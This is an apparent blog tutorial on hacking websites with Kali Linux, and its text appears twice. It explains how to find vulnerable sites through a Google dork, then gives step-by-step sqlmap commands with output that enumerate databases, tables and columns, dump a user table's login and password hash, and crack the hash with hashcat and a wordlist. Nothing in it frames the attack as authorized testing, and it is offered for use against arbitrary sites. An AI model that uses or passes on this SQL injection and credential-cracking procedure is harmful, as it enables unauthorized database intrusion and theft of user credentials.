How to hack a website and database using Kali Linux

Procedure 1:

google-dorks-hacking

Hacking a website and getting its database details can be done only with the vulnerable website to find these websites type inurl php id=” in google to get the sites

Fire up the terminal and type the following command

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Enumerate DBMS databases

This commands reveals some of the info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under ‘/usr/share/sqlmap/output/www.sqldummywebsite.com’
So, as you see  there you have two database that we can look into. information_schema is a standard database for almost every MYSQL database.  As per the sqldummywebsite database.

Procedure 2:

The List tables of will be displayed select the target database using SQLMAP SQL Injection
Now we have to do is that we have to know how many tables this sqldummywebsite database got and what are their names. To identify that out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Pretty good  this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: ‘sqldummywebsite’
[10:56:22] [INFO] heuristics detected web page charset ‘ISO-8859-2’
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

and then  of course we want to check the inside user_info table using the SQLMAP SQL Injection as that table probably contains username and passwords.

Procedure 3:

List columns on target table of selected database using SQLMAP SQL Injection.we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table ‘user_info’ in database ‘sqldummywebsite’
[10:57:18] [INFO] heuristics detected web page charset ‘ISO-8859-2’
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
That our target is the table user_login and user_password .

Procedure 4:

List of the usernames we have got from the target columns of target table of selected database using the SQLMAP SQL Injection
Now , we have to do is just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Using this we have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Procedure 5: Now we have to extract password from the target columns of target table of selected database using SQLMAP SQL Injection
Just use the below command to extract password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+—————+
| user_password |
+—————+
| 24iYBc17xK0e. |
+—————+

This is the hashed password. That’s the password is in the encrypted and now we have to decrypt it.
We have  to decrypt the password extensively on using the Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux .

Procedure 6: Cracking password
Now we have the hashed password as 24iYBc17xK0e.

Procedure 6.a: Identify Hash type
Kali Linux provides us the tool and we can use tool  to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:
hash-identifier

So  below is DES(Unix) hash.
Procedure 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.

  • 0Shares

Post Pagination


hack any website with kali linux, hack website database tool, how to hack database of a website using backtrack, how to hack database of any website, how to hack database server, how to hack mysql database, how to hack website database using windows, how to hack website database with cmd

google-dorks-hacking

Procedure 1:

Hacking a website and getting its database details can be done only with the vulnerable website to find these websites type inurl php id=” in google to get the sites

Fire up the terminal and type the following command

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Enumerate DBMS databases

This commands reveals some of the info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under ‘/usr/share/sqlmap/output/www.sqldummywebsite.com’
So, as you see  there you have two database that we can look into. information_schema is a standard database for almost every MYSQL database.  As per the sqldummywebsite database.

Procedure 2:

The List tables of will be displayed select the target database using SQLMAP SQL Injection
Now we have to do is that we have to know how many tables this sqldummywebsite database got and what are their names. To identify that out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Pretty good  this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: ‘sqldummywebsite’
[10:56:22] [INFO] heuristics detected web page charset ‘ISO-8859-2’
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

and then  of course we want to check the inside user_info table using the SQLMAP SQL Injection as that table probably contains username and passwords.

Procedure 3:

List columns on target table of selected database using SQLMAP SQL Injection.we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table ‘user_info’ in database ‘sqldummywebsite’
[10:57:18] [INFO] heuristics detected web page charset ‘ISO-8859-2’
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
That our target is the table user_login and user_password .

Procedure 4:

List of the usernames we have got from the target columns of target table of selected database using the SQLMAP SQL Injection
Now , we have to do is just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Using this we have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Procedure 5: Now we have to extract password from the target columns of target table of selected database using SQLMAP SQL Injection
Just use the below command to extract password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+—————+
| user_password |
+—————+
| 24iYBc17xK0e. |
+—————+

This is the hashed password. That’s the password is in the encrypted and now we have to decrypt it.
We have  to decrypt the password extensively on using the Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux .

Procedure 6: Cracking password
Now we have the hashed password as 24iYBc17xK0e.

Procedure 6.a: Identify Hash type
Kali Linux provides us the tool and we can use tool  to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:
hash-identifier

So  below is DES(Unix) hash.
Procedure 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.

  • 0Shares

Post Pagination


hack any website with kali linux, hack website database tool, how to hack database of a website using backtrack, how to hack database of any website, how to hack database server, how to hack mysql database, how to hack website database using windows, how to hack website database with cmd

Leave a Reply

Your email address will not be published. Required fields are marked *